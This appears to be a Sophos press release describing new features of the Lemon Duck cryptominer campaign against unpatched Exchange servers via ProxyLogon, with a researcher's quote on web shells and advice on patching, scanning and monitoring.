The new technical features uncovered by Sophos researchers include:
- The abuse of certutil.exe, a Windows Certificate Services command line utility, to download malware that will help the Lemon Duck operators further exploit the targeted server and others on the same network, as well as the cryptocurrency-mining component. The downloaded modules and miner are then launched using PowerShell. In other versions of Lemon Duck, PowerShell is used to perform both the download and execution
- The mining payload is installed as a Windows Service – and the file is renamed as “Microsoft Defender Antivirus Network Inspection Service”
- The attackers create a user account and enables remote desktop access through RDP
- The malware code used to disable and remove security products has been updated with a new list of vendors
- Cobalt Strike beacon is also delivered as part of this campaign and attempts to contact a command-and-control server
Please attribute the following quote to Rajesh Nataraj, senior threat researcher at Sophos:
“We recently noticed that the ProxyLogon exploit had been added into an updated version of Lemon Duck, an advanced cryptominer. This updated version was being used to target unpatched Microsoft Exchange servers with new features and functionality that allow the malware to establish a firm foothold in a compromised server and evade detection and removal by defenders. Most notably, this version of Lemon Duck allows an attacker to copy the web shells they use and hide them in a different location – boosting the likelihood of the shells remaining unseen so they can be used again.
“Web shells are pernicious. They provide attackers with a permanent backdoor into a victim’s web applications and related systems, with the ability to add commands of their choice, whenever they want to, direct onto the web server, without needing to login first.
“Defenders should take urgent steps to install Microsoft’s patches to prevent exploitation of their Exchange Server. However, patching is not enough on its own – organizations need to determine and address their wider exposure so they don’t remain vulnerable to later attacks. For instance, admins should scan the Exchange server for web shells and monitor servers for any unusual processes that appear seemingly out of nowhere. High processor usage by an unfamiliar program could be a sign of cryptomining activity or ransomware. If this isn’t possible, closely monitor the server until you migrate the Exchange data to an updated server then disconnect the unpatched server from the internet.”
Sophos Intercept X and Sophos Intercept X with EDR protect against threats attempting to exploit the ProxyLogon Exchange vulnerabilities.